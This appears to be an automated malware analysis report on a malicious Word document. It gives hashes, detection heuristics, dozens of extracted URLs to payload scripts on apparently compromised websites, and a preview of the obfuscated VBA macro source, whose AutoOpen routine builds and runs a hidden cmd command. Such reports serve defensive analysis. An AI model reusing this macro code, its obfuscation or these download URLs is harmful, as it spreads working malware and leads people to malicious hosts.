Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 772a7a52572945f4…

MALICIOUS

Office (OLE)

280.9 KB Created: 2018-07-25 09:34:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: 237073d2f7a487c16b78eb4588b3da69 SHA-1: e31dbfa87d379625aed8ac1d74c47b84842a139b SHA-256: 772a7a52572945f4baaf586f1cdbc07b1bc2e8a21b728a0d7115a33b1bf2936a
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The script uses the Shell function to execute a command, indicating an attempt to download and run a second-stage payload. The presence of numerous unknown-reputation URLs suggests potential C2 infrastructure or payload hosting.

Heuristics 7

  • ClamAV: Doc.Malware.Valyria-6735715-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6735715-0
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 287,641 bytes but its declared streams total only 147,264 bytes — 140,377 bytes (49%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.artone.mocksitetest.com/wp-content/plugins/contact-form-7/includes/mod_filezipr.php In document text (OLE body)
    • http://www.sk.mocksitetest.com/wp-content/themes/betheme/tribe-events/mod_filezipr.phpIn document text (OLE body)
    • http://www.smartex.mobi/libraries/joomla/observer/updater/mod_filezipr.phpIn document text (OLE body)
    • http://www.spnlv.212dev.com/wp-includes/js/tinymce/themes/mod_filezipr.phpIn document text (OLE body)
    • http://www.nikerfas.info/wp-admin/css/colors/ectoplasm/mod_filezipr.phpIn document text (OLE body)
    • http://www.thesocialreel.com/wp-content/themes/twentyfourteen/css/mod_filezipr.phpIn document text (OLE body)
    • http://www.due.tiensamedia.com/_application/vendor/symfony/polyfill-util/mod_filezipr.phpIn document text (OLE body)
    • http://www.armadaii.ru/js/validate/css/temp_b1e485dd54f9c2a8869ec14dcc04a053/ini_mod_filezipr.phpIn document text (OLE body)
    • http://www.sixandseven.nl/admin/language/de_DE/total/mod_filezipr.phpIn document text (OLE body)
    • http://www.almasaonline.com/wp-content/plugins/mollie-payments-for-woocommerce/includes/mod_filezipr.phpIn document text (OLE body)
    • http://www.paranormaltours.com/pt/wp-content/themes/twentyfifteen/mod_filezipr.phpIn document text (OLE body)
    • http://www.wolnow.com/wp-content/plugins/listingpro-ads/js/mod_filezipr.phpIn document text (OLE body)
    • http://www.maharajahotels.in/wp-content/plugins/contact-form-7/languages/mod_filezipr.phpIn document text (OLE body)
    • http://www.yfs.mocksitetest.com/wp-content/plugins/wp-job-manager/assets/mod_filezipr.phpIn document text (OLE body)
    • http://www.eenutrition.org/wp-content/plugins/one-click-demo-import/assets/mod_filezipr.phpIn document text (OLE body)
    • http://www.bumiagrofarm.com/wp-includes/SimplePie/Decode/HTML/mod_filezipr.phpIn document text (OLE body)
    • http://www.ahangon.vn/wp-admin/css/colors/midnight/mod_filezipr.phpIn document text (OLE body)
    • http://www.olmrentcar.212dev.com/ognerrte/wtuds/mod_filezipr.phpIn document text (OLE body)
    • http://www.centraltraining.com.my/wp-admin/css/colors/midnight/mod_filezipr.phpIn document text (OLE body)
    • http://www.everestdiamondinn.com/wp-content/uploads/2018/09/mod_filezipr.phpIn document text (OLE body)
    • http://www.bymakas.net/wp-content/uploads/2016/01/mod_filezipr.phpIn document text (OLE body)
    • http://www.anfearseo.com/wp-content/plugins/yikes-inc-easy-mailchimp-extender/process/mod_filezipr.phpIn document text (OLE body)
    • http://www.mybandbook.com/wp-content/plugins/ari-fancy-lightbox/languages/mod_filezipr.phpIn document text (OLE body)
    • http://www.sanicontrol.com/sanicontrol3/wp-content/plugins/metricool/mod_filezipr.phpIn document text (OLE body)
    • http://www.5.sablecreations.com/rtypisjw/sotpie/mod_filezipr.phpIn document text (OLE body)
    • http://www.hessiancoffee.co.uk/tyoinvur/wtuds/mod_filezipr.phpIn document text (OLE body)
    • http://www.provuetechnologies.com/expo/wp-includes/SimplePie/Decode/mod_filezipr.phpIn document text (OLE body)
    • http://www.baogiabaofsp.com.vn/images/icethumbs/320x200/100/mod_filezipr.phpIn document text (OLE body)
    • http://www.mazonit.co.il/wp-content/uploads/2015/06/mod_filezipr.phpIn document text (OLE body)
    • http://www.plaquettevichycelestinsspahotelcasablanca.212dev.com/js/libs/cmaps/mod_filezipr.phpIn document text (OLE body)
    • http://www.primedtalent.lk/wp-content/plugins/duplicator/ctrls/mod_filezipr.phpIn document text (OLE body)
    • http://www.newlinkgenetics.com/wp-content/plugins/backupwordpress/admin/mod_filezipr.phpIn document text (OLE body)
    • http://www.product-catalog.wpconciergela.com/wp-content/themes/twentyfifteen/inc/mod_filezipr.phpIn document text (OLE body)
    • http://www.southherocongregationalchurch.org/wp-content/themes/twentysixteen/js/mod_filezipr.phpIn document text (OLE body)
    • http://www.funics.com.sg/main-0/libraries/fof/string/mod_filezipr.phpIn document text (OLE body)
    • http://www.dapurnadia.com/wp-content/plugins/contact-form-7/modules/mod_filezipr.phpIn document text (OLE body)
    • http://www.hartaetos.gr/libraries/joomla/crypt/password/mod_filezipr.phpIn document text (OLE body)
    • http://www.speed.webcoder.ch/bins/lib/bootstrap/fonts/mod_filezipr.phpIn document text (OLE body)
    • http://www.energyspecialist.skurpmarketing.com/wp-content/plugins/woocommerce/i18n/mod_filezipr.phpIn document text (OLE body)
    • http://www.chengyufuke.com/kong/lib/plugins/adminer/mod_filezipr.phpIn document text (OLE body)
    • http://www.westridgesproutgarden.info/wp-content/themes/Divi/lang/mod_filezipr.phpIn document text (OLE body)
    • http://www.almi-shoes.ru/wp-includes/js/tinymce/plugins/mod_filezipr.phpIn document text (OLE body)
    • http://www.web002.scauidc.space/wp-includes/SimplePie/Decode/HTML/mod_filezipr.phpIn document text (OLE body)
    • http://www.washmanapp.com/wp-content/plugins/js_composer/vendor/mod_filezipr.phpIn document text (OLE body)
    • http://www.xn--1-7sbc0bfr0ah0c.xn--p1ai/components/com_gcalendar/libraries/fullcalendar/mod_filezipr.phpIn document text (OLE body)
    • http://www.courses.jsswebdev.com/wp-includes/js/jquery/ui/mod_filezipr.phpIn document text (OLE body)
    • http://www.mytrinityumc.org/wp-content/uploads/2018/04/mod_filezipr.phpIn document text (OLE body)
    • http://www.zineozine.212dev.com/wp-content/plugins/zilla-likes/languages/mod_filezipr.phpIn document text (OLE body)
    • http://www.art-stone-ru.com/wp-content/uploads/2014/05/mod_filezipr.phpIn document text (OLE body)
    • http://www.test2.ts.com.ps/sitepro/js/photoswipe/default-skin/ini_mod_filezipr.phpIn document text (OLE body)
    +1020 more URL(s)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29723 bytes
SHA-256: 831614cd71219df8270d1591dba916d447de8f28a6c1285cc7561766d30988b2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jovqOBvRlNiVR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   MJjaaH = SrzLBh
   TwYpd = CInt(FjzBj / ZzUKNO * 22030 - hQFSJl)
   uSrnF = 6
wMYIzu = "" + MvMVUIGZN + RzzzQipROnucPw + CVar("cm") + CUhRviLXzwY + DHNLKdV + UIzWwNJL + uTAvWVmp + hQqafY + tSJJEbjfzB + izvaAvGAmP + SOFJuJaEO + ianZnrivkS + vZDKCH + wDMhH + EGjJhOqrk + lUMFX + YYjizjCt + OqCbYKOQaS + RYChw + aNDaSPHasQv + GqfXVKsnm + iWCddKj + SDVHwnicz + lflGdnRMqRY + wCVNHkNZT + YuNliTfZY + HtbXa + bHmVdV + iOOQT + VGQrzww + CKnZks + DdBvD + RqTQibQWN + JdUbOITBWT + iWYrkMLij + zajJrhOX + FEIGUiLKbR + lJHtrLSnmF + SnqSzzuQoU + KjGShTf + ltBbWwG + hlnMJDiBPLq + mdCuwmM + ZIchFfzzm + BhNIuiTAZHiYuw
   XtHEU = 311
   rGjsB = CBool(5)
Shell@ wMYIzu, 0
   aoLiA = Cos(4874)
End Sub


Attribute VB_Name = "YaRCzHvjhlTcHt"
Function UIzWwNJL()
On Error Resume Next
pVACZ = HSdsnf
   mJozl = Tan(QrIbjZ)
oMUAvlYns = "d" + "     " + "   " + "       " + "/c       "
LJOfVD = CBool(501)
PwqWjj = "  " + "      C" + "Md  /v:   " + "   /" + "c" + "  " + CStr(Chr(sViAWzlZ + owfLcccnOWbdLQ + 34 + BRiakHGuVF + TaqdscXLms)) + " sEt  " + " '{@]"
zbzwN = Sin(SzkGU)
   wWDfN = 816
   bWLVN = CLng(60)
nQwiJw = "=\_\_" + "---/-\_\/"
zFRjV = 233439149
   PZliT = 3364
WNzQnYIZrOs = "_/ /"
ktzHvh = 40
   qikYm = Rnd(32873 * XErOo * 94395 + wKvFzb)
   orFUhB = UuTJw
knGAXnff = "/\_" + "-" + "_-\\" + "\"
UIzWwNJL = oMUAvlYns + PwqWjj + nQwiJw + WNzQnYIZrOs + knGAXnff
   ODYll = Rnd(62815 * 24518)
   uFica = Tan(NHjlzq + SRjCMk)
   iBrUaB = CDate(qjkjz)
End Function
Function uTAvWVmp()
On Error Resume Next
KJzJRNGo = "--/__"
HCfdb = CLng(96462 - hBquj * 69058 / bRoPDH)
   lqajYs = Log(5)
   rMPEmI = jGQABQ
FtOqDwjuOr = " -/" + "_/_\-" + "\" + "--\//_\ " + "\" + "//_-\-_\/" + "_-/-\ -\_\"
QQlFa = Rnd(95)
   IfuhSd = CBool(OtibiN)
mcmDFYXVjwZ = "-/-_//\_-" + "_/ \/_/" + "//_\" + "_-" + "--_-\ /\_-" + "_-_/--"
jlMsO = Chr(24655 * sqlYiP)
   IwZZV = jsiwY
   PFiwM = Hex(2)
FZYqdYjvCH = "\_/\\" + " \-\\/" + "/" + "_" + "_/-/"
ofdkNz = 4
   vzQWSL = GkdCDl
pMkiUDCXpaC = "-_" + "\- \/" + "\/_\/_-" + "\/-__- -_" + "-\/\"
QnDtiw = UUtuoI
QVvoMvFaUpA = "\_-_" + "///\- " + "//-_" + "_--\_-\/" + "/_\"
uTAvWVmp = KJzJRNGo + FtOqDwjuOr + mcmDFYXVjwZ + FZYqdYjvCH + pMkiUDCXpaC + QVvoMvFaUpA
   GBOvXR = vztQvH
End Function
Function hQqafY()
On Error Resume Next
EjTjGH = Oct(SiPzAH)
   fvNMrf = Sgn(7)
   XdFiH = CByte(cnnhj)
zPFaFT = " -" + "-" + "_\_///-" + "\\-\/_ _/-" + "\\-\/\-_/-"
GIaQaHS = "__ --_//__" + "--_/\\\" + "\ -\/_\"
OruhHWmjOv = "-/_\" + "/-\/-_" + " _/-/\\"
MNlEY = WaQFCw
   SVDYa = Cos(pivFv / zPAAF + tNGdAJ - HsUWAK)
QHVfjmqmKU = "\" + "/-_" + "_/\-- --\" + "/-//" + "\/\_\-__ -"
HzQSM = "-/\___/\//" + "\_\-}\\/-_" + "_/-_//_\\"
MMmiXQ = CStr(oVujS)
TSEizDTmBE = "-"
hQqafY = zPFaFT + GIaQaHS + OruhHWmjOv + QHVfjmqmKU + HzQSM + TSEizDTmBE
   uuHKl = 856
End Function
Function tSJJEbjfzB()
On Error Resume Next
UZMIK = CDbl(7)
   hFWnpY = 9052
CPmQviWiwz = "}\\/" + "/_\\" + "_-" + "-_/--_{_"
YZbAmp = Sqr(OjkOpV)
   lLZPJ = Tan(YHEFKH + NwiwQE / BcLPYi - sCNBf)
ljWAJQbAmzq = "-//" + "__-\/\" + "--/\\h_/\" + "/_/\-" + "/" + "\-_--_c_"
blqOvduv = "\_" + "/\/-\--"
LuJzPI = Log(20)
FWVOUMU = "/" + "\/-_t//" + "_\--\_/" + "/\--\_a" + "\-_\\__-" + "-/-"
tSJJEbjfzB = CPmQviWiwz + ljWAJQbAmzq + blqOvduv + FWVOUMU
   EPUBH = VcQZS
   ajjErE = Int(owoWCv * PzmtbB)
End Function
Function izvaAvGAmP()
On Error Resume Next
AJsfj = 42
EutHi = "///\c/-\_/" + "-_\_\/_" + "-/-}/\_/\" + "\___-/--\-" + ";_-/_--" + "//\\-/" + "\\_k\_/-"
pvpiD = "_" + "\//" + "_-_-\\/a-" + "\/\/_" + "-/-\" + "-\_/" + "_e-_\_-"
GfPQu = CBool(cPYII)
SkWYMjjKpT = "\-/_/\" + "//-\r-//" + "_\_\_\-_-/" + "/\b--\_//" + "\-_//\__-" + ";//\/\-_-" + "\\/_-_-h"
wknSG = Hex(cBvShr / IplrbU)
  
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.